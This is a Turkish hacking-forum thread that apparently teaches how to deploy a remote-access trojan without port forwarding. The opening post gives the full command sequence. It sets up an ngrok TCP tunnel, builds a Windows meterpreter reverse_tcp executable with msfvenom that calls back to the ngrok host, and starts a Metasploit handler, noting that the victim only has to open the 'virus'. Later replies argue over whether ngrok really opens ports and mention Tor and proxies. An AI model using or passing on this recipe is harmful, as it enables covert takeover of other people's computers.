Portsuz kolayca rat atın

25 Ağu 2023
80
23
Öncelikle port nedir? Port sizin bir cihaz, bir server'a uzaktan bağlanmanızı sağlayan kapıdır aslında. Ve bu kapıdan tehlikeli paketler de geçebilmektedir dolayısı ile port kendiliğinden açık asla gelmez, sizin açmanız gerekir ve bazen güvenlik duvarını da kapatmanız gerekebilir bu sebepten dolayı. Peki biz şimdi ne yapacağız?



Port açmak büyük bir derttir ve sizi anlıyorum çünkü ben de açamadım ve bir kaç yıldır bununla uğraştım. Fakat şimdi sizi bu dertten kurtarmak adına böyle bir konu açtım. Öyleyse konuya geçelim..

Şimdi söyleyeceklerim çok klişe gelebilir fakat bu konu diğer konulardan farklı ve burada bahsettiğim ngrok methodu diğerlerinden farklıdır

Sevgili kullanıcı öncelikle ngrok indirmelisin.

images



curl -s
https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok

ardından ngrok tokenini almalısın ve bunu kaydetmelisin



./ngrok config add-authtoken <token>



Ardından ./ngrok tcp 8080 komudunu girin ve portu serveri aktifleştirin



Sunucumuz açıldı, güzel. Sakın kapatmayın ngrok'u



şimdi sıra virüsü oluşturmaya geldi biz payloadımızı msfvenom'dan oluşturacağız, tercihimdir, iyidir, güzeldir.

images


Komutlar:



msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows lhost=<ngroktan aldığınız ip> lport=<ngroktan aldığınız port> -f exe -o /root/virusumunadi.exe



ÖNEMLİ!!! (x.tcp.ngrok.com olan lhost : sonrası ise lport'tur. Ngrok'a 8080 komudunu girdik ancak kullanacağımız port o değil bize verdiği porttur.)



Şimdi metasploitimizi başlatma vaktidir!

Komutlar:



msfconsole



[COLOR=rgb(97, 189, 109)][SIZE=5][B]use exploit/multi/handler[/B][/SIZE][/COLOR]



şimdi show options deyip ayarları görüntüleyelim

(İşte şimdi önemli noktalardan birindeyiz. Şuan dinleyiciyi setup ettiğimiz için kendi ip adresimizi ve portumuzu gireceğiz, port demişken endişe etme! Dert olmayacak bize bu


)



set LHOST 0.0.0.0

set LPORT 8080 (Ngrok'u çalıştırırken açmasını emir verdiğimiz port)



exploit -j -z (Ve bu son komutla sessiz modda dinleyici setup ettik şimdi tek gereken kurbanın virüsümüzü açmasıdır)
 
27 Ağu 2022
85
39
ngrok port açmanı sağlamıyor.
ngrok sunucularını kullanıp gelen-giden istekleri yönlendiriyorsun.
çok doğru. Bende ekleme yapacaktım fakat ekleme yapılmış zaten. Ngrok port açmaz port dediğimiz şey kendi ip adresinde açılabiliyorsa o zaman port açma sayılır onun dışında farklı bir platform aracılığı ile yapılan işleme kanal görevi görüyor diyebiliriz. SYN ACK tcp el sıkışma işlemi gibi denebilir. Gelen istekleri sadece iletiyor fakat ngroku çıkartan platform buna önlem aldı. En ufak fake site, Trojan, Exploit tarzı şeylerde açmış olduğunuz kanalı belirli süre içerisinde kapatıyor ve güvenli bulmuyorum ngrokun açmış olduğu kanaldan geçen her veri platform tarafından kayıt altına alınmaktadır. Basit ve önemli olmayan işler için birebir kullanılabilir tabiki.
 

tamam ağa

Uzman üye
7 Haz 2023
1,493
842
çok doğru. Bende ekleme yapacaktım fakat ekleme yapılmış zaten. Ngrok port açmaz port dediğimiz şey kendi ip adresinde açılabiliyorsa o zaman port açma sayılır onun dışında farklı bir platform aracılığı ile yapılan işleme kanal görevi görüyor diyebiliriz. SYN ACK tcp el sıkışma işlemi gibi denebilir. Gelen istekleri sadece iletiyor fakat ngroku çıkartan platform buna önlem aldı. En ufak fake site, Trojan, Exploit tarzı şeylerde açmış olduğunuz kanalı belirli süre içerisinde kapatıyor ve güvenli bulmuyorum ngrokun açmış olduğu kanaldan geçen her veri platform tarafından kayıt altına alınmaktadır. Basit ve önemli olmayan işler için birebir kullanılabilir tabiki.
aynı işlevi tor'da yapıyor.
 
27 Ağu 2022
85
39
aynı işlevi tor'da yapıyor.
Konunun tor ile ne ilgisi olduğunu anlayamadım ?
Tor internette gizli surf yapılmak için oluşturulan browser gizlilik olarak diyorsanız evet tünelleme yapıyor fakat işe yaramıyor algoritmasını tersine mühendislik ile çözen siteler çok çabuk açığa çıkartıyor seni.

Konu ip adresi üzerinden port açılamayıp ngrok gibi bir alternatifin sağlamış olduğu kanal üzerinden haberleşme :D
 

tamam ağa

Uzman üye
7 Haz 2023
1,493
842
Konunun tor ile ne ilgisi olduğunu anlayamadım ?
Tor internette gizli surf yapılmak için oluşturulan browser gizlilik olarak diyorsanız evet tünelleme yapıyor fakat işe yaramıyor algoritmasını tersine mühendislik ile çözen siteler çok çabuk açığa çıkartıyor seni.

Konu ip adresi üzerinden port açılamayıp ngrok gibi bir alternatifin sağlamış olduğu kanal üzerinden haberleşme :D
proxy yapabilirsin.

onion sitelerde bu mantıkta çalışıyor port açmıyorsun.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.